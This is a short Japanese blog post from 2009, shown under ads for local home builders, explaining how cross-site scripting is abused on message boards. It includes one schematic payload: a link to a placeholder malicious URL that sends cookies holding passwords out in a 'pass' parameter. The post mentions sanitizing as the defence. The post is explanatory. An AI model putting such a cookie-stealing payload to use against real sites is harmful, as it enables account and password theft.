香川県の新築・一戸建て・工務店なら石田工務店

香川県の新築,一戸建て,工務店の「石田工務店」は親切丁寧な地域密着型の会社です。一生に一度の大切な買い物は安心・信頼の香川県の石田工務店へ!

新築一戸建て・工務店(愛知県)なら三昭堂

新築一戸建て,工務店(愛知県)なら「三昭堂」。地域密着型の会社です。一生に一度の大切な買い物は安心の新築一戸建て,工務店、「三昭堂」へ!

信頼のリフォーム(姫路)なら大聖住宅

姫路のリフォームなら「大聖住宅」。自然素材で健康住宅も手がける会社です。リフォームで失敗しない、大切な家をお願いするなら姫路市工務店の 「大聖住宅」へ!

  

モンスターカレンダー

? 2009年3月 ?
12345678910111213141516171819202122232425262728293031

2009年3月 6日アーカイブ

 前回XSS(クロスサイトスクリプティング)についての説明の記事を書いた。今回どのようなケースで悪意のあるスクリプトを書くのか記事を書いてみたいと思う。

 掲示板でHTMLやJavaScriptのタグが使用できるとなると、一体どのよなタグを入れてくるのか?JavaScriptではクッキーが読み出せるので以下のようなタグを入れてくるケースが多い。

<a href='https://悪意のあるサイトURL/?pass=<script>クッキー読み出しのスクリプト</script>'>クリック</a>

 上記の"クリック"を押すと"pass"というパラメータでパスワードなどを保存したクッキーが送信されてしまう。またimgタグを使用すれば画像など読み出しただけで送信されるみたいである。このような事を防ぐ対策として"サニタイジング"というやり方がある。

次回この対策についての記事を書いていきたい。

ランキングに参加しています!
Support by